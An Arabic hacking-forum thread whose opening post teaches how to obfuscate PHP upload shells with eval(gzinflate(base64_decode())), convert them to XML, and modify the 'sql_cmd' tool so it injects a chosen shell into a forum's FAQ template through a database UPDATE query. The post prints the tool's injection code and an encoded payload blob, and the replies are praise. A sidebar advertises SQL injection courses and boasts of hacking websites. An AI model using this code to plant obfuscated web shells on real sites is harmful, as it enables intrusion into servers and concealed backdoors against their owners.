1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

الموضوع في 'آمن المواقع والسيرفرات' بواسطة αЗѕαя, بتاريخ ‏24 مايو 2013.

كاتب الموضوع : αЗѕαя المشاهدات : 2,292 الردود : 16 ‏24 مايو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    αЗѕαя
    DeveloPer Plus

    عضو منذ:
    ‏15 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    السلام عليكم ورحمه الله وبركاته ..!!

    كيف حالكم ان شاء الله بخير وصحه وعافيه ..!!

    كان كل ما يحقن في ملف الـ faq في احدى المنتديات ..!!

    تطلع له صفحه بيضاء .. ولا حظت كثير الابطال الي تمر عليهم هالمشكلة ..!!

    فراسلني وطلب .. تغير مركز الرفع الي في سكربت السويسري sql_cmd ..!

    الى مركز رفع او شيل يتخطى ..!!

    فعلدت على السكربت .. والحمد الله .. مشي الحال ..!!

    فقلت انزل الشرح على المثل الي يقول

    "لا تعطيني سمكة بل علمني كيف اصطاد"

    المتطلبات .. سيرفر شخصي او شيل على موقع ..!!

    بسم الله ..!!

    اولا حمل هالاداوت ..!!

    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]


    بعد فك الضغط عنها راح نجد .. !!

    [​IMG]

    ممتاز .. عرفنا وظيفة كل ملف ..!!

    نرفعهم على موقعنا سواءا سيرفر محلي او على مساحة عندنا ..!!

    نستعرض اول ملف ..!!

    decode.php

    [​IMG]

    اذا جينا نضع الكود المشفر .. يجب ان يكون شكله كتالي ..!!
    كود PHP:
     <?php eval(gzinflate(base64_decode('الكود المشفر')));
    ?>
    [​IMG]

    وبعدها نضغط على decode ..!!

    وتظهر امامنا الاكواد مفكوكه ..!!

    [​IMG]


    ممتاز .. طيب .. الحين .. نجئ للتشيفر .. !!

    نستعرض الملف ..!!

    encode.php

    [​IMG]

    نأخذ كمثال اداة مركز الرفع المعروفه .. ونضعها بوسمها في الصندوق ..!!

    [​IMG]

    وبعدها نضع الخيار مثل الي في الصورة اعلاه ..!!

    ونغط obfuscate .. ويطلع لك الناتج مثل كذا ..!!


    [​IMG]

    انسخ الكود ومبروووك عليك عندك مركز رفع مشفر ..!!

    طيب ... الحين نستعرض الملف الثالث المرفق .. !!

    php2xml.php

    نستعرضه ..!!

    [​IMG]

    تمام الحين .. ناخذ كمثال مركز الرفع المعتاد ..!!

    ناخذ اكواده ونضعه في الاداة .. بدون وسم php ..!!

    لتصبح ..!!

    [​IMG]

    نضغط على convet ..!!

    ليخرج لنا الناتج التالي ..!!

    [​IMG]

    ننسخ الكود ونضعه باسم كمثـــال up.xml ..!!

    وصلى الله وبارك ..!!

    نجئ للجزء الثاني .. من موضوعنا ..!!lol

    طريقة التعديل .. على اداة السويسري sql_cmd ..!!

    (طبعا ما خصيت هالاداة .. الي ان استخدامها شائع و كثير هم الاعضاء الي يواجهون هذه المشكلة عند حقن الشيل
    وذلك وضعت الطريقة حتى كل شخص .. يضع الشيل الي يعجبه)

    وضع شيل اخر او مركز رفع مشفر غير الموجود في الاداة ..!!

    لكن حتى نعرف الية عمل السكربت .. يجب تتبع .. ومعرفة دالة الحقنة التي تستدعى في الاداة .. وتحقن ..!!

    نفتح السورس حق الاداة ..!!

    [​IMG]


    طبعا الحقنة تكون في ملف faq .. بحثنا وطلعتنا دوال الحقنة في ملف faq ..!!

    نبحث .. ونشوف .. الية عمل الاداة .. و الدالة المستدعيه للشيل ..!!

    [​IMG]

    ممتاز وصلنا .. لمربط الفرس .. هنا طول الله اعماركم ..!!

    كود PHP:
    $host $_POST['host'];
    $user $_POST['user'];
    $pass $_POST['pass'];
    $db   $_POST['db'];
    $faq  $_POST['index'];

    if(isset(
    $host) ) {
    $con =@ mysql_connect($host,$user,$pass) or die ;
    $sedb =@ mysql_select_db($db) or die;
    $crypt  "{\${eval(gzinflate(base64_decode(\'";
    $crypt .= "$shell";
    $crypt .= "\')))}}{\${exit()}}</****area>";
    $sqlfaq="UPDATE template SET template ='".$crypt."' WHERE title ='FAQ'" ;
    $query =@ mysql_query($sqlfaq,$con); 
    ناخذ الي يهمنا .. !!

    كود PHP:
    $con =@ mysql_connect($host,$user,$pass) or die ;
    $sedb =@ mysql_select_db($db) or die;
    $crypt  "{\${eval(gzinflate(base64_decode(\'";
    $crypt .= "$shell";; 
    يقول اذا بيانات الاتصال بالقاعده صحيحه يستدعي قيمة $shell الي هي مركز الرفع الموجود بالاداة ..!!

    ويحقنها بتشفيره eval(gzinflate(base64_decode ..!!

    ممتاز يعني نبحث عن قيمة shell في الاداة ..!!

    وجدناه ..!!

    [​IMG]

    يعني هذا هو المركز الرفع المشفر الي تستعمله الاداة في الحقن ..!!

    طيب .. مركز الرفع هذا على كلام بعض الاخوه .. ما تخطى معهم ..!!

    وش نسوي ..!!

    مثل ما تعلمنا في الجزء الاول من الموضوع ..!!

    ناخذ اي اداة ونشفرها .. ونضعها مكان قيمة shell يعني هنا ..!!

    [​IMG]


    لكن مع مراعاة .. اننا اذا شفرنا كما تعرفتم اعلاه .. بيكون كذا !!

    كود PHP:
    <? eval(gzinflate(base64_decode('
    bVFPa4MwFD+v0O/wDIUobO0uO9XoeujKWGED15OI
    RI0YMCZoMujGvvuiaUthhQRe3u/f4yWOwlg1aj5j
    ZSMBh0UUFv108dL2c9NRwfxgiaf2qojw+sKtZS+A
    lprLjiAEgulGVgQpOWgErCv1UTGChGk1V7TXq5H/
    UFFNEYyuBBnVSlqxHgGvrl7XGbxTRoNzqnnLzlJX
    D/zb1k+PKDoRHZhbK3QSDaYQXLsE1/+irbHAYYqz
    ymmuKZPXPizyj/fkM8UjF2dACJyZEMDPfHZnSc+l
    VEd/kb+87rdJisdZcJZiLVQ+DoCze/gHOiCwHnBZ
    tTOG5PCWbBPwPG9c8GX/a/i1cawd2A3NbrPb7G9L
    7Intr/4B
    '
    ))); ?>
    ناخذ التشفيرة الي بين الاقواس فقط ..!!

    كود PHP:
    bVFPa4MwFD+v0O/wDIUobO0uO9XoeujKWGED15OI
    RI0YMCZoMujGvvuiaUthhQRe3u
    /f4yWOwlg1aj5j
    ZSMBh0UUFv108dL2c9NRwfxgiaf2qojw
    +sKtZS+A
    lprLjiAEgulGVgQpOWgErCv1UTGChGk1V7TXq5H
    /
    UFFNEYyuBBnVSlqxHgGvrl7XGbxTRoNzqnnLzlJX
    D
    /zb1k+PKDoRHZhbK3QSDaYQXLsE1/+irbHAYYqz
    ymmuKZPXPizyj
    /fkM8UjF2dACJyZEMDPfHZnSc+l
    VEd
    /kb+87rdJisdZcJZiLVQ+DoCze/gHOiCwHnBZ
    tTOG5PCWbBPwPG9c8GX
    /a/i1cawd2A3NbrPb7G9L
    7Intr
    /4B
    لان الاداة معرفة لديها هذه الصيغه وموجوده كما لاحظنا اعلاه ...!!

    اتمنى ان الموضوع يفيدكم ..!!

    في امان الله !:"


    [​IMG]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    V!P-Hero
    DeveloPer Plus

    عضو منذ:
    ‏27 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    12
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    وعليكم السلام
    بارك الله فيك أخي على الموضوع المميز و المنسق
    تستاهل التقييم تقبل مروري المتواضع~:{1}:​
     


  4. غير متصل

    ӎƦ.HmidE
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الوظيفة:
    .....
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    بآرك آلله فيك ي بطل
    جآري ++
    :{1}:
    آلوشم آلخمآسي للموضوع
    [​IMG]
     


  5. غير متصل

    .ılı.Iяẫqi.ılı.
    DeveloPer Plus

    عضو منذ:
    ‏22 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    شـــــــرح جميل جدااا بارك الله فيك أخي
    جاري الايك + التقيم
     


  6. غير متصل

    Tr0J4n
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏3 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    في القمة دائما ً يا مبدع

    شرح قمة في الاحترافية

    تقبل مروري يا [ أسد :{1}:]

    و جـــآري التقييم أن أمكن

    تحياتي ​
     


  7. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    وربي ابداع والله صراحه

    موضوع متعووووب عليه بجد

    وجاري تقيمك بقوووووووووووه

    %:"​
     


  8. غير متصل

    Abu Ahmed AlMadridi
    rank
    Developer

    عضو منذ:
    ‏16 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    وعليكم السلام والرحمه

    ابدعت بطرحك يالغالي وهذي عادتك دائما مبدع

    شرح واضح وسهل وورايق

    تسسلم يمينك على الطرح الراقي
     


  9. غير متصل

    مجنــ قلبي ـون
    rankrank
    Developer

    عضو منذ:
    ‏18 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    مبدع ياغالي
    يسلمو ع الشرح متعوب عليه بصراحه​
     


  10. غير متصل

    ÐấŖҚ йІḠḣṭ
    rank
    Developer

    عضو منذ:
    ‏16 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    طالب علم
    الإقامة:

    رد: فك تشيفرة gzinflate + الية تعديل على اداة sql_cmd + تشفير بصيغة xml

    شرح رائع , تنسيق اروع , استمر ابداعاتك

    جاري تقييمك
    :{8}:​
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...